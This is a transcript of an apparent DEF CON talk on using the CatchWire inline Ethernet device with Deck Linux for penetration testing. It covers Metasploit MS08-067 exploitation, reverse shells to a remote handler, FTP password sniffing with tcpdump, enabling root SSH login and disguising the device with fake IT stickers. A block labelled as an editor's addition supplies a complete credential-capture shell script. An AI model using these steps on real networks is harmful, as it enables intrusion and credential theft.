The talk I wanted to give today is called Hacker in the Wire. So it's a little bit about this guy here. It's called a CatchWire, and I'll tell you a little bit more about this device. But essentially it is a little computer that you can let live on your network, and you can hack people, do fun stuff like that.

So what's this talk about? It's about a hacking device that lives on a gigabit Ethernet wire, and it's the CatchWire. It's made by WAW Technologies, and it's running Deck Linux. Some of you might be familiar with Deck Linux. I've given some talks here at DEF CON before. I lied before; it's not my first time at DEF CON. But I described how you can build some of these little things, and this talk is about porting some of that stuff that I did with a BeagleBone to work on this new device.

So why would you want to do this? You can do multiple things with it. You can do some command and control and exfiltration using different options. You can either do things on the network which you've installed this into, or you can remote control it using some XBee radios, and I'll talk a little bit about that. And of course you can use some other technologies such as cellular networks.

So why should you care about this stuff anyway? Well, a CatchWire running Deck Linux is small. I mean, you can literally fit it in your palm. It's pretty flexible, and you can network it together with some other devices, such as some of the BeagleBone-based devices I've talked about at previous DEF CONs. And you can easily take this guy and install him in a couple of places. So you could put it in your data center. So you have a client, we'll just call them the target client. And if you can get into their data center, in particular if they have Power over Ethernet, you can take one of these little guys, you plug it in, and you're having lots of fun. You're getting all the packets. You might want to narrow it down a little bit more. You could put it on a LAN segment.
Maybe there's only one LAN segment that's of interest to you. Of course, you could also inline a single PC if that's what you want it to do. If you can find an unused desk, slap it under there and be on their network.

A little bit about me. Some of you have seen me around. I'm a professor at Bloomsburg University in Pennsylvania, and I teach pentesting, information security and digital forensics. Also, I've written a couple of books. This book is one of them, Hacking and Penetration Testing with Low Power Devices. And we actually have a new book that we're releasing through Pentester Academy tomorrow on Linux forensics, if that's of interest to you. I've been programming since I was about eight, in assembly since I was ten, hacking hardware since I was around 12 or so. I've also been known to fly, build planes, do some other aviation stuff. And of course I'm an author for Pentester Academy and some others as well.

So what are we going to talk about? We're going to talk a little bit about the CatchWire. What is it? What does it do? We'll talk a little bit about Deck Linux, some of the attacks that you can do with this device or with a BeagleBone Black based device. And we'll talk about some things that you can do specific to the CatchWire, and some ideas for future directions that you might want.

So the CatchWire. What is it? It used to be called the LUNA, the Little Universal Network Appliance. They had a Kickstarter last year, I believe, and they changed the name after the Kickstarter for some legal reasons. It's essentially like the BeagleBone Black, except it's got two gigabit Ethernet interfaces on it, it supports Power over Ethernet, and it also has a nice integrated FTDI USB-to-serial chip. What it doesn't have that the Beagle has is the HDMI output or all of the GPIO headers. So in terms of the software, it's very similar, which was something that made it very easy for me to port what I had done with the BeagleBone over to this new platform.
Here's a block diagram. You can see it's got a TI processor, and if you look at this and compare it to the BeagleBone Black, you will see that it's very similar other than having the full gigabit Ethernet stuff. The board looks kind of like this. You can see it's got a couple of gigabit Ethernet ports. You've got a Power over Ethernet pass-through module, so you can go ahead and pass the power through the device if you want, or not, and that's what those J1 headers are for. On the bottom of the board you have the processor, memory and some other stuff as well, including a micro SD card slot that you can use if you want to load up something like Deck Linux.

So speaking of Deck Linux, what is it? Deck Linux is something that I made a while back. It's essentially built on Ubuntu 14.04, and it's optimized for pentesting with things like the BeagleBone, CatchWire and similar things. So you can use this as a dropbox, a hacking console, a remote hacking drone. There are a lot of different uses for these little devices. It has over 4,000 packages pre-installed. And I will say this: unlike certain other pentesting-oriented distributions, which I won't name, it's pretty much fluff free. It's got 4,000 packages that people actually use, not something that someone wrote 10 years ago and no one's used since.

To that base OS I've added some extra things. I have these different modules, such as the MeshDeck. The MeshDeck allows you to remotely command and control these devices using XBee or ZigBee mesh networking. So it allows you to command and control and coordinate attacks. You can attack from up to two miles away. I've also developed the AirDeck. It's a flying hacking drone that I built on top of a Quadshot, if anyone is familiar with that. It's a nice flying landing platform that is shown in the picture here as well. And so I have that as another possibility.
So, you know, let's say you don't have good physical access. You can actually fly in your hacking hardware, land on your target's roof, hack the crap out of them, and fly away. I also developed the 4Deck, which is a forensics module that lets you do USB write blocking and things like that. And I developed something new called the UDeck, the USB deck, for USB-based attacks. And actually that's what my other talk is tomorrow. So tomorrow I'm going to sell this as the first ever Friday night keynote presentation at DEF CON, which basically means somebody asked, can we bump you to 7 p.m. on a Friday? And I said, oh, okay. I'm the only person talking at 7. If you're bored and you're not eating dinner, come by. We'll talk USB attacks.

Okay, so the CatchWire. How are you going to power this thing? Well, if you have Power over Ethernet, you're golden. I mean, that's the best option ever. Just plug it in, you're good to go. As I said before, you can pass through the power using the jumpers on the device. You can also use a DC adapter; it has a plug on the end for DC power. That's the second best option. And you can also use USB power. There's a USB port, and you can use it to power the device via a charger. If you're going to do this, you should have a 2 amp or greater charger. You can power it from a PC. So if you hook it into a PC, you can power it that way. But be careful, because normally you're limited to 500 milliamps with a USB 2.0 port, and that's not enough to power up the CatchWire, a couple of gigabit Ethernet ports, and maybe your Alfa wireless adapter or an XBee module attached to it.

So how do you configure one of these guys? If you want to do some hacking with your CatchWire, all you have to do is grab the image. I have the image hosted at my faculty page over at Bloomsburg, and there's a nice little script. Just download the whole thing, and you can create a micro SD card using the provided script.
You're going to need at least a 16 gig card, because it will not fit on an 8 gig card. And honestly, I'd recommend a 32 gig card, because it's a little bit tight at 16 gig. There's a lot of hacking goodness built into this. I recommend at least a class 10 card or faster; if you've got a nice fast card, you can create the card in about half an hour or so. Then install it into the CatchWire. That's pretty easy: just take the screws off the end that has the micro USB, the board pulls out, insert the card, and you're good to go. You can connect the CatchWire to a PC via USB, and you can just log in if you want to do some initial configuration. The password is temppwd. Add stuff as you need before you deploy it.

So what does it look like? It's kind of like this. So cross your fingers, everyone. We're going to go ahead and connect to the CatchWire. Before I do that, I need to set up my serial port. This is from an Ubuntu system, and I will change this to ttyUSB0, no flow control. I'll plug in the device, and here we can see some of the boot sequence. Now this will take a little bit longer than the typical boot sequence you'd see if you were booting the standard version of Linux that comes with the CatchWire. The reason for that is that I am booting up Deck Linux here, and that has an awful lot of extra stuff that is coming up. You can see here where it came up and started a bridge process that bridges the two Ethernet adapters, and here we are bringing up some additional stuff. Now I can go ahead and log in. The default login is ubuntu / temppwd, as displayed in the banner message. I've managed to boot Deck Linux, so that's pretty easy. By the way, the first time that you boot it, it might take a little bit longer because it has to set up some stuff on the SD card. Do not write-protect the SD card; it can cause some problems.
Okay, so I talked a little bit about bridging the Ethernet connections. Now that's the default on the CatchWire. It'll come with some network flow monitoring software and everything pre-installed, and the kernel options are also going to have this bridge set up. But if for some reason you wanted to split it, you can, and it's pretty easy. You just change to the /boot/dtbs directory. DTBs, if you're not familiar with these things, stands for device tree binaries. Device tree binaries are a clever and elegant way of accounting for all the different kinds of hardware you can have on your systems, especially on these systems. All you need to do is change that overlay, that binary that describes the device. You just copy the dual-MAC version over the LUNA version and comment out some lines in the udev rules, as I indicated here. If you want to go back, you just reverse the process: uncomment the lines and change it back to the luna-switch DTB file, and it's all good to go.

Something else you might consider doing is installing a MeshDeck. You know, why would you want to do that? Why wouldn't you want to do that? Because it's cool, right? You can command and control, slash exfiltrate some data, from up to two miles away without using any kind of gateways or extenders. Of course, if you want to use a gateway, you could be on the other side of the world, if you have an XBee-to-Internet gateway of some sort. And it's also out of band. Yes, you can use an interface on the target's network when you connect the CatchWire, but people see that traffic. People don't see the traffic on the ZigBee, unless they're using ZigBee, and even then they probably don't notice it, honestly. It's pretty easy to integrate your CatchWire into a multi-device pentest. Maybe you have your case full of a bunch of BeagleBone Blacks and a few other bits of equipment. You can use either mesh networking, ZigBee networking, or you can use a star.
And that's an easy choice to make. To do this you just get a USB adapter, plug the XBee into that, and plug that into the CatchWire. If you want details on that, go back and look at my DEF CON 21 talk. Again, I lied; it's not my first time. You can get some more details in that talk. You can also, you know, read my book if you had to. Another nice thing about installing the MeshDeck: maybe there's some blocking, maybe there are some firewalls that are going to prevent you from easily accessing that built-in interface on the target network from wherever you are, whereas the XBee is not going to be blocked by a firewall. So it's another plus for it.

So I'm going to start with an old friend. Here it is: using an old friend, maybe using an old friend with a CatchWire. I've gone ahead and run up Metasploit on my CatchWire. One of the first things I want to do is just verify that I'm connected to my database, which I am. Then I can go ahead and run a db_nmap, and we can see that it's finished. We should also notice that this host here, .123, looks like it has some interesting services. It's got an FTP server, an HTTP server, and some Windows file shares. So it looks like we might have some interesting opportunities to exploit things on that machine. And of course I can run my hosts command. I can also run services. So now that I have my list of hosts and services, let's have another look at this list and find something that we might want to try to attack. I see right here that I have a FreeFloat FTP server, which could be vulnerable, and some other things that are vulnerable as well. Well, let's start with our good old friend, good old MS08-067. So I'm going to run up this exploit, ms08_067_netapi. Show options, set RHOST to 192.168.1.123. Now I'm going to set my payload, show payloads, show options again, and we will say our local host, LHOST, is here.
Now we're ready to run our exploit. And there you have it. We just opened a Meterpreter session on a Windows machine using our old friend MS08-067. I can go ahead and do a screenshot. Here we go. And all the usual Meterpreter commands. All right, so, you know, it's pretty fun. It's a good chunk of fun to take a little handheld device and pop Windows boxes. Maybe it's just me.

So some other stuff you can do. Let's do a little bit of sniffing. Obviously this is an awesome device for doing sniffing on a wired segment. We noticed that there was an FTP server running, so let's go ahead and sniff some traffic. The command we're going to use is just tcpdump for a particular host. The command is tcpdump -n, and host and the name of the host, -v, which says hey, please be verbose, for the host, and -A, which says dump these packets as ASCII. Sorry, I can't speak today. It's early. It's only Thursday. I haven't been drinking. And pass that to egrep. What we're going to look for is the USER prompt, where they sent their username, or where they sent their password. And of course with FTP it's all in clear text. So let's do this and try it. We have a host that's running an FTP server. We can verify that with nmap. If I do an nmap on 192.168.1.120, which is a system that we previously identified as running FTP, we can then use the CatchWire to capture all the packets to or from that system. Again, the CatchWire is installed inline on this LAN segment, so I can pretty much do whatever I want. And here we see, sure enough, yes, there is an FTP server running. So I will go ahead and run tcpdump, and I give it -n, host, and the name or IP address, -v, please be verbose, and -A, capital A, which says take all of your stuff and send it to ASCII, give me an ASCII representation of my packets.
I will pipe that to egrep and look for either USER in uppercase and then a space, or PASS in uppercase and then a space. Once I do that, it will start listening. I can go to another machine in my network and log in via FTP, and voilà. There you have it. User joe logged in with password password1. Now one thing I should say: I'd say not bad, and did we even have to write a script? It's like one line. So loads of fun.

What about all the other stuff that you might want to do? What if you want to use Wireshark? You can use Wireshark with the CatchWire as well. Something you can do is use the CatchWire to capture packets and then send those on to Wireshark. Before you can do this, however, you're going to have to let root log in. Normally root is not allowed to log in, which is a good thing. So you're going to have to go in and edit a config file that allows root to log in via SSH. Now why not let root log in through SSH? Well, root is a very well known user ID, so then you only have to guess the password. You can figure that one out. It's not a good idea to normally have it enabled. Another thing I will say about this: I don't do this in this demo, but you should probably use some filters. Even the most clueless sysadmin might get a little bit suspicious if there's suddenly this doubling of traffic and it's all flowing out of his network. So maybe filter it a little bit and narrow that focus. All you have to do is just SSH in. The command is ssh root@ whatever your CatchWire address is, and then you give it something to run: tcpdump -s 0, capture the full packets, -w -, write them to standard out, and you pipe it to wireshark -k, which means please run right away, -i -, the interface will be standard in. So you want to do some sniffing on the CatchWire and have it displayed on your workstation elsewhere.
How can you do this? The first thing you need to do is enable root to log in, because by default root is not allowed to log in. You need to go to the /etc/ssh/sshd_config file, and in that file you will find a line that says PermitRootLogin, which I have already changed to yes. Previously it said without-password. So if you wanted to set up keys, that was allowed, but if you wanted to use a password, it was not. Now that that's been done, let's quit and go ahead and show you how to run this. So on your workstation, not the CatchWire device, you need to bring up a terminal and run this command. The command is going to be ssh root@, and again you want to run this as root because being prompted for a password is problematic and you need to be root in order to run tcpdump appropriately. Here's the address for my CatchWire. Here I have the full path to tcpdump. I'm going to output full packets. I'm going to write them to -, which means standard out. I pipe that to wireshark -k, -k means please immediately run this, -i -, so it's going to accept input from standard in and take that input and display it. I'll go ahead and press enter. Notice that Wireshark popped up, prompted for my root password, and now I'm listening. Not much is happening at this moment, but as I start generating some traffic it will. So I can repeat my previous demo. I'm going to log in to my FTP server, and there we have it. I've logged in. I'm going to stop my capture here and do a search where my target address is .120, and what do I have here? There's a request: USER joe, PASS password1. So there you have it. That's another way that I can sniff some traffic, and in this case I'm exporting that traffic remotely to another workstation.
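The two capture recipes above (tcpdump piped to egrep on the CatchWire, and tcpdump piped over SSH into Wireshark on the workstation), as an added worked example written by the editor; it is not part of the talk and not code from Deck Linux or WAW Technologies. It assumes the bridge interface is named br0 and the FTP host is 192.168.1.120 (both assumptions; use whatever ifconfig shows). It adds the two things the speaker mentioned but did not show: a BPF filter that narrows the capture to one host's FTP control channel, and, for the remote version, an exclusion of the SSH session itself, without which the packets carrying the capture get captured and re-sent in a feedback loop. -l line-buffers tcpdump so awk sees each line as it arrives through the pipe, and -U does the same for the -w stream. The USER/PASS match is deliberately unanchored because tcpdump -A prints the IP and TCP header bytes as dots on the same line ahead of the payload.

```shell
#!/bin/sh
# Added example (editor's, not from the talk): narrowed FTP credential capture
# on the CatchWire, plus a remote capture piped to Wireshark that excludes its
# own SSH stream. Interface name and host addresses are assumptions.
set -eu

CW_IFACE="${CW_IFACE:-br0}"   # assumed name of the bridge the boot log showed

# BPF filter that keeps only the FTP control channel of one host, so the
# capture volume stays small (the speaker's "use some filters" caveat).
ftp_bpf() {
    printf 'host %s and tcp port 21' "$1"
}

# Pull USER/PASS commands out of tcpdump -A output on stdin and pair them
# into "user password" lines. The CR that ends each FTP line is stripped, and
# the match is unanchored because header bytes precede the payload on a line.
ftp_creds() {
    tr -d '\r' | awk '
        match($0, /USER [^ ]+/) { user = substr($0, RSTART + 5, RLENGTH - 5) }
        match($0, /PASS [^ ]+/) { print user, substr($0, RSTART + 5, RLENGTH - 5); user = "" }
    '
}

# Live capture on the CatchWire itself. -l makes tcpdump line-buffer its
# output so the awk stage sees credentials as soon as they cross the wire.
sniff_ftp_creds() {
    tcpdump -n -l -A -i "$CW_IFACE" "$(ftp_bpf "$1")" | ftp_creds
}

# Command line for the workstation side of the remote capture. "not tcp port
# 22" keeps the SSH session that carries the capture from capturing itself;
# -U flushes each packet to the -w stream immediately instead of buffering.
remote_wireshark_cmd() {
    printf "ssh root@%s 'tcpdump -n -s 0 -U -w - -i %s \"not tcp port 22 and (%s)\"' | wireshark -k -i -\n" \
        "$1" "$CW_IFACE" "$(ftp_bpf "$2")"
}

case "${1:-}" in
    sniff)  sniff_ftp_creds "$2" ;;        # sh sniff.sh sniff 192.168.1.120
    remote) remote_wireshark_cmd "$2" "$3" ;;   # sh sniff.sh remote <catchwire-ip> 192.168.1.120
esac
```

Run the sniff form on the CatchWire and the remote form on the workstation (it prints the ssh | wireshark pipeline to copy). The remote command works unchanged with key-based root login, so the default PermitRootLogin without-password setting can stay as it is rather than being relaxed to yes.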
Okay, so, you know, if that one line on the command line with that grep command was too much, you don't have to write anything, right? Just type the Wireshark command, a couple of filters, and you can do this. All right, well, that was kind of fun, but I think we could have some more fun. So here's what I'm going to do in this next demo. I'm actually going to run up Metasploit on the CatchWire, and I'm going to use my XBee connection to the CatchWire to find services, find what's vulnerable, and run up Metasploit. Then on another machine, maybe a machine back in my office where you have an intern or somebody waiting for inbound connections from my pentest, they're going to run a multi/handler, and I can either have my Metasploit on the CatchWire directly connect to them, or alternatively I could drop some sort of a payload using Metasploit on the CatchWire in order to do the same thing. So let's see how this works.

Let's go ahead and do a demo with the CatchWire that is connected to my workstation via XBee or ZigBee networking. I've gone ahead and installed the MeshDeck add-on, and I have plugged in my USB adapter, which allows me to control my CatchWire from up to two miles away. Again, another thing to keep in mind: why would you want to do this? You might be blocked by firewalls and such, and in addition to that it might be very suspicious if there is suddenly a bunch of traffic flowing out of your target's network. So I'm going to run up the MeshDeck server, and I've set up my CatchWire to be device three. I'll run a quick test just to make sure everything is working properly by running dmesg again, and it is. I can also check my networking with ifconfig, and I can see that this device has attached itself at address .120. Again, if I use this, I need to be aware that I might have issues with detection from my target.
Let's run nmap on a machine in this network. I can see this machine is running an FTP server, a web server, appears to be doing Windows file sharing, and has some other things running as well. So let's have some fun with Metasploit. We'll run a Metasploit command and we'll just pop up a simple shell. I don't really type this fast, by the way, and you can also see how I fat-finger stuff occasionally. So now let's have a look at another machine. I set up a multi/handler, set the payload appropriately to my reverse shell, set my parameters, and run the exploit. Pretty soon I get a shell that's created. However, it almost immediately dies because of some problem, which is not unusual with Metasploit. Occasionally things just don't work. So I hit it again, and this time I successfully created a reverse shell. I can interact with it in Metasploit, and from there I can run all the various shell commands, such as a quick ipconfig just to verify that I'm on the machine that I think I am and it's connected to everything else. All right, so again, the exploit is being run on the CatchWire that's in the network, and then it's redirecting that victim machine to your multi/handler that's running who knows where: somewhere out on the Internet, in your office, etc. I didn't do a demo of this, but again you could just as easily take your CatchWire and drop a payload instead of saying please start a reverse shell, a Meterpreter shell, etc.

Here are some ideas for some other possibilities. I just briefly touched on using the MeshDeck with the CatchWire. Again, if you go back to my DEF CON 21 talk you can get a lot more details on that system and how it works. You might get some further ideas. You could use the MeshDeck for toggling sniffing on and off; if you want to do some sniffing or narrow your focus, it could be useful for that. And hey, don't just sniff, inject some packets.
Nobody says you can't do that too. You might also want to use the MeshDeck to communicate things like cracked passwords to other hacking drones in your pentest. There is a facility in the MeshDeck not just for running commands; there's also a facility for transferring files in both directions, and a facility for sending announcements in both directions. So it's pretty easy on your CatchWire or your other hacking drone just to say, okay, please send an announcement back to the command console saying hey, guess what, I just cracked this password. You could also do some online password cracking with a tool like Hydra. I've done this; I didn't have a demo for that today. You can do some other attacks. Social engineering. Social engineering is always fun. Who likes social engineering? Yeah. Maybe add some cool stickers from your IT department: Do Not Touch, IT, whatever. I don't recommend hacker con stickers, okay. You could sell it to people as a network extender or a performance enhancer. It's going to enhance my performance as a pentester, but you, not so much, as a victim.

So hopefully I've given you a few ideas of some of the things that you can do. Now if you do have any questions about this stuff, I am doing a demo lab Saturday from noon to 2, or 1200 to 1400 if you prefer that format. Also I will be spending a lot of time at the Pentester Academy booth, the SecurityTube booth, in the vendor area. If I'm not there, ask; I'll probably be around soon. And of course the best reason to stop by is to win some free stuff. Does anyone like free stuff? All right. I like free stuff too. So here's one of the cool things you can win. Actually, the people at WAW were nice enough to donate not one but two of these. So first of all, kudos to them. This is a nice proper case, right? They didn't just say hey, there's some stuff in a baggie, have fun. They have a CatchWire in here, there's an Alfa adapter in here,
a couple of XBee Pro radios in there. And don't worry, there's more. I also donated a couple of copies of my book to go along with it. So definitely come by SecurityTube and register for a chance to win that. Also I think we're going to give away a couple of copies of my new Linux forensics book that's coming out tomorrow, again, limited copies here. I will say this for those of you that are paranoid, especially those of you that said you like social engineering: there will be a QR code that you can scan. There's one required question: what is your email address? It goes to me. It doesn't go to anybody else. So unless you check the other optional boxes, we're not going to spam you. I just want to give you stuff. Really. It's not a social engineering attack. Anyway, thank you for coming to my talk, and I hope you have a good DEF CON.